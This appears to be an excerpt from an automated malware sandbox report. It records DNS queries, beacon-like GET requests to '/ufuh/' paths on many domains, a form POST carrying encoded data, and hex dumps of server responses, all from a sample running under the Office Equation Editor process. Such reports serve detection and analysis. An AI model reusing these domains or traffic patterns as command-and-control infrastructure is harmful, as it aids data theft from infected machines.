Source: global traffic	HTTP traffic detected: GET /ufuh/?ZXdp=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&7jsp7=zz9xHbtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.terelprime.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /2022/sqlite-dll-win32-x86-3390000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ufuh/?ZXdp=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&7jsp7=zz9xHbtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.kinkynerdspro.blogUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ufuh/?ZXdp=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL&7jsp7=zz9xHbtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.xn--matfrmn-jxa4m.seUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ufuh/?ZXdp=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&7jsp7=zz9xHbtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.primeplay88.orgUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ufuh/?ZXdp=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L&7jsp7=zz9xHbtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.aceautocorp.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ufuh/?ZXdp=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR+z/FEUJE9molBo2WPCHkLm6APtf7MOscmEgy++mrhWyRAZYaHU6QWLXqtmVhlHsy7bZNd62MlyuoEIWFEUa6hs&7jsp7=zz9xHbtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.mrart.co.krUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ufuh/?ZXdp=A8fQf/hISgzwL3oVRnqHbZBV/plXIsny1TYZTQxVDrtx1SbFVUn9YIU/QNlk/lJ+xLSyvfTMvWvwfwkJSN9/6ikOA0zWpJ/i6bk9+sgLcEv6BHfAlNSdkle4dEVn&7jsp7=zz9xHbtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.touchclean.topUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ufuh/?ZXdp=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIWVgo7b/xQLPX/O/pu59XEvJBdpQtuyZPu55k1rSFoeWQFZxG8CIiSfRAJf8aFXer&7jsp7=zz9xHbtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.ibistradingco.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ufuh/?ZXdp=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRh4O9IVNf1Nsq6o0EG0WMSPhA6OEupR23w6ucrxxNSq0Kjb577lAvo9ttp2iO4V&7jsp7=zz9xHbtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.jnkinteractive.co.krUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ufuh/?ZXdp=BGoM8L/qyzApLAJaWwxXSF4Q93O5MlPc94ZXocaCy2sUMxOmUp3yiivF6ezDdXcwaqjwM/LWkQHX7JcCzmOdeG0afWN38JyHw8R/BztNg4nUSBFA8ZqxTffzx161&7jsp7=zz9xHbtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.riveramayahousing.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ufuh/?ZXdp=5rQyp7AfCpcectMtK85Tor8vuSCbHlk40GVR54bgOEPBq5WbA6vQ6axdzD+rl+5xsD3/ThNnrc69/oVplzpG8oUJt2RlBzVyO+lvFGg0fvO7LE0dkvQsR1cSiZis&7jsp7=zz9xHbtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.exclaimer342200213.netUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ufuh/?ZXdp=QOfqZ3C365rWM5PNnqKgcYVw/D14oMJ0U94Qap1ZDEZ76SuXpRuIURFJIFOuyM+4ZYaYHsoNTZRkaIPARhaxfi59ArfSwjebkEhnFs3MoqVX/bchVRHPl2c5fWqR&7jsp7=zz9xHbtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.platinummedia.infoUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ufuh/?ZXdp=AB4ctQE666ii/AhBeU9kZh5iWeUIVV2Kc96SebEnk+bcHC5BDpeWN0JKSYAnMmkj4c+BMV0TAiBI+jfmHribLN3e02N+gzPDpozTfLSXwflSzJVcZV+WbefZbN8X&7jsp7=zz9xHbtX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.elenagilherrero.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36

Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: dukeenergyltd.top
Source: global traffic	DNS traffic detected: DNS query: www.besthomeincome24.com
Source: global traffic	DNS traffic detected: DNS query: www.terelprime.com
Source: global traffic	DNS traffic detected: DNS query: www.sqlite.org
Source: global traffic	DNS traffic detected: DNS query: www.99b6q.xyz
Source: global traffic	DNS traffic detected: DNS query: www.kinkynerdspro.blog
Source: global traffic	DNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
Source: global traffic	DNS traffic detected: DNS query: www.primeplay88.org
Source: global traffic	DNS traffic detected: DNS query: www.aceautocorp.com
Source: global traffic	DNS traffic detected: DNS query: www.mrart.co.kr
Source: global traffic	DNS traffic detected: DNS query: www.touchclean.top
Source: global traffic	DNS traffic detected: DNS query: www.ibistradingco.com
Source: global traffic	DNS traffic detected: DNS query: www.jnkinteractive.co.kr
Source: global traffic	DNS traffic detected: DNS query: www.chrisdomond.com
Source: global traffic	DNS traffic detected: DNS query: www.riveramayahousing.com
Source: global traffic	DNS traffic detected: DNS query: www.exclaimer342200213.net
Source: global traffic	DNS traffic detected: DNS query: www.platinummedia.info
Source: global traffic	DNS traffic detected: DNS query: www.elenagilherrero.com

Source: unknown

HTTP traffic detected: POST /ufuh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Length: 2161Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedHost: www.kinkynerdspro.blogOrigin: http://www.kinkynerdspro.blogReferer: http://www.kinkynerdspro.blog/ufuh/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 5a 58 64 70 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 45 32 71 62 32 65 4c 53 47 74 5a 47 78 57 6e 4b 49 33 78 68 48 77 41 32 4b 4e 45 67 65 67 34 59 49 54 43 56 57 45 79 7a 75 4c 39 47 75 77 37 69 54 6e 77 56 72 2f 78 59 6b 6c 6d 54 6f 62 67 6e 4b 59 70 51 57 61 57 67 39 76 57 63 4f 51 68 57 38 5a 67 55 73 4f 52 72 58 69 39 39 38 2b 56 70 63 78 63 6e 4d 4f 71 52 62 32 31 41 31 41 69 7a 5a 69 4f 53 43 35 30 52 44 54 57 41 67 6d 44 6b 46 49 39 76 58 4c 39 50 56 2f 41 79 4d 64 57 63 30 75 42 64 2f 4a 50 70 32 47 56 75 6b 62 43 6b 32 68 6f 67 75 6d 33 70 51 42 4c 62 4d 66 43 46 62 6b 77 4c 4f 36 69 4b 6f 46 4a 53 70 65 64 37 4a 72 73 58 67 4c 6c 61 57 4d 6d 47 66 53 4e 2b 4c 36 7a 63 78 37 58 33 39 35 55 6b 46 53 2b 69 41 4f 6d 44 58 62 33 6b 66 30 62 56 71 32 51 49 59 6e 57 4b 76 74 57 48 45 48 76 51 39 73 43 52 77 78 66 68 6a 4b 4d 6c 7a 6f 48 5a 47 75 66 78 39 50 58 52 36 78 71 44 39 56 6f 72 51 43 4d 35 52 78 31 71 4d 73 73 4f 61 51 6e 43 6b 67 63 4b 70 43 6f 73 69 69 54 69 44 69 33 76 5a 43 4f 70 39 41 30 6d 66 79 71 57 75 58 71 65 4d 79 75 4f 48 64 39 61 46 4c 51 59 46 71 30 5a 66 4e 69 50 68 5a 44 56 61 62 4c 39 6f 31 6b 36 53 79 34 52 53 68 65 30 61 4f 71 57 59 4e 73 58 49 41 78 56 73 56 4a 35 6a 51 69 64 63 49 77 77 39 4b 30 75 59 49 36 6e 62 72 2f 51 52 58 46 52 53 33 31 4f 6e 39 61 35 39 45 52 70 34 78 44 42 66 6e 57 35 67 4c 48 53 6b 6b 56 7a 38 6b 36 55 46 65 42 68 70 6f 2f 36 74 48 7a 6c 76 38 62 48 54 61 5a 36 6b 6b 58 46 63 52 6e 7a 79 6a 63 59 51 53 32 43 71 31 45 55 42 50 78 37 56 46 67 71 6a 6e 6d 56 4e 74 37 50 76 4f 67 78 61 75 71 51 45 2f 73 6f 46 51 46 54 30 4d 5a 6d 69 71 5a 4a 63 6a 30 39 39 62 58 4b 2b 73 4c 79 45 76 52 41 52 62 48 6e 61 61 69 55 66 62 63 53 51 69 49 61 50 31 6d 58 2f 48 42 63 64 6e 43 47 43 39 54 33 6f 65 4a 61 45 73 2f 6a 63 6d 4d 74 6f 53 66 39 45 7a 7a 42 32 53 42 37 57 44 67 6c 62 47 33 68 36 43 4c 77 35 4c 75 43 5a 53 6a 57 34 72 65 69 75 4c 47 43 57 42 74 6f 53 33 41 6e 6a 48 36 41 77 72 66 4f 57 55 2f 4b 55 61 37 5a 6d 6a 32 63 71 38 57 31 6b 4e 78 59 7a 66 59 32 69 51 50 70 65 4d 31 6e 72 49 44 34 6b 70 49 31 33 30 38 2f 2b 50 73 42 4f 64 58 7a 4d 78 70 45 4c 4f 6d 74 74 6d 78 4e 66 6a 4d 4b 63 43 7a 6a 6a 64 72 44 61 64 51 4c 58 33 38 79 6f 49 45 74 47 6a 66 6c 4b 4e 39 74 45 7a 41 54 45 37 37 41 45 48 73 37 71 50 36 61 65 39 69 69 42 33 70 63 66 77 43 52 36 31 74 51 6d 67 51 6f 70 63 68 2b 56 72 56 4e 76 49 6e 39 50 59 6d 71 68 45 66 6e 58 75 2f 73 46 52 57 31 2

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Jun 2024 06:52:10 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 03 Jun 2024 06:52:50 GMTContent-Type: text/htmlContent-Length: 580Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Jun 2024 06:53:24 GMTServer: ApacheX-Powered-By: PHP/8.1.28Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 9730Content-Type: text/html; charset=UTF-8Data Raw: 13 53 cb 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 9f a9 da 9f a5 cb e9 19 9e 48 84 03 40 00 58 5a a8 14 67 8b 7f 69 4e 7e b3 3d 1e 88 04 25 6e 28 82 03 40 c5 cb e5 5f b6 ea f3 bc a5 63 32 81 24 59 32 81 97 2c 39 06 a2 b9 7a 90 79 aa ea 9e 8e a8 9e d9 d1 70 a8 17 4e 31 24 c5 e2 1d 67 be 84 aa ae ae ee e1 fb fb 91 c1 33 84 e8 38 72 ec 19 61 0b d8 70 64 b8 64 58 86 6c 3d 86 6a b2 fd b4 fb 06 11 51 14 51 93 76 db 70 79 99 58 f7 de 86 10 ac 25 02 13 93 a1 9a c9 d8 e4 97 03 27 30 58 c8 54 32 df 5a 8c b9 bd 10 f9 21 22 92 70 57 3d 45 37 cf 39 e5 74 4c 81 19 a8 3e 4a c0 e0 76 c9 35 60 d2 59 2b a4 87 09 0e f6 69 16 b9 6c 1f ae 50 b2 ab bd c4 70 95 53 0a 88 16 3a 07 45 5b 15 ee 10 81 d8 52 ea 36 2b 81 cb 7c 4a d7 a9 3f ec d6 2f 07 d6 47 75 3d 07 c6 20 1d 63 99 16 f1 4c d7 9e 29 be c0 be 19 18 8c 07 76 25 90 77 ef 5d 88 12 3e d7 1a 3e 9f bc 81 d4 31 ce 7a f6 48 cb 0f 7d 37 fc 00 ab fb 6a dd 0c 0e f3 35 68 b5 af 0f eb 13 37 5c 6c b3 51 b5 be df 84 4d 3b 4e f0 a0 d0 b4 c7 0a 88 a3 69 9d 91 4b 37 9c 15 e8 a8 83 70 5e 1a fc ac 75 63 8e 96 42 4e 36 d9 e3 5f db 06 85 cf 85 6d d7 8e 10 95 7d 2c 8a f8 04 35 43 db 65 86 7b 66 af 97 51 1f cd 6f dd a3 f6 be 1b f6 0e 2a 98 50 0e 9d f8 6e fb 7a e1 8b 5d f1 bc 79 de 38 76 99 b8 33 f0 3c 01 26 7b de 08 69 f3 79 83 e0 15 3c 6f 44 cc 38 0b 9f 37 a9 bc a6 f2 79 83 08 d2 57 8f 0a 24 1d 37 02 44 90 3b ef 71 8e b9 f3 fe 65 bf 3b ef 7f 7a 7f 9b 3b 7f c4 9c 6c ad bf 68 42 b5 19 6a e5 bd 72 18 f8 24 b1 63 cf 3a 79 19 a9 bc be ae f9 9b 73 44 9f 75 2a f8 75 56 51 3d f9 59 db 2a 61 31 0b d1 3c 97 cb cd dd cd 29 16 70 ea 50 0b 3a 07 98 eb b4 44 3f 5e 37 70 b7 59 de cc d5 d9 1f 74 64 28 98 8e 31 c4 11 5d ee fb 30 d4 81 1e f3 f6 6d ff 84 af 26 31 fe aa 6f da 79 57 68 52 e8 37 8a a2 95 ef 28 e0 2b 3f e9 bf b7 01 9e 4b a7 9d eb cc f0 e8 8d 55 7b cd 9c f6 0f 5e 1f 03 43 8a db 1a 2b 22 8f ee da b7 c0 63 ac b9 fc b2 c6 d3 3c 93 b0 79 cc 88 27 af a9 59 51 f3 1c fe a5 6b 1f 70 c2 89 66 b5 1a ce ca 31 09 d7 4e 7c 92 ab e7 80 89 66 6d d7 f7 df f4 d5 07 9e 70 c2 eb 92 cc 57 94 3e fa f7 6e f0 a1 fc 6c ad 7a 0b 34 db 6b 5f 5c 9e ef af ca 2b f4 29 9b 87 77 65 61 62 ab 80 ae 6d 43 5f 10 8a 74 ad d0 f4 ac f8 b7 27 f1 4c 6a e2 6b a9 5f 0d e8 aa aa ec 93 7f 99 31 93 df 78 a2 62 fb 0b 03 8f a7 5a 39 8d 2a 94 21 54 78 06 54 af 15 3d 9f 9a 2c ac 9f 4f 4d db 86 cf a7 56 f3 f6 f9 24 39 6f 9e 4f 32 51 a9 6b 35 04 fa dd 77 d7 00 7f bc 11 c5 0d ea 13 9b 56 fd bd 6c 88 76 13 22 13 e8 94 f0 6a 75 7d 4f db 46 ef d9 45 fc c4 3a 49 Data Ascii: SC@E`:H@XZgiN~=%n(@_c2$Y2,9zypN1$g
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Jun 2024 06:53:26 GMTServer: ApacheX-Powered-By: PHP/8.1.28Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 9730Content-Type: text/html; charset=UTF-8Data Raw: 13 53 cb 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 9f a9 da 9f a5 cb e9 19 9e 48 84 03 40 00 58 5a a8 14 67 8b 7f 69 4e 7e b3 3d 1e 88 04 25 6e 28 82 03 40 c5 cb e5 5f b6 ea f3 bc a5 63 32 81 24 59 32 81 97 2c 39 06 a2 b9 7a 90 79 aa ea 9e 8e a8 9e d9 d1 70 a8 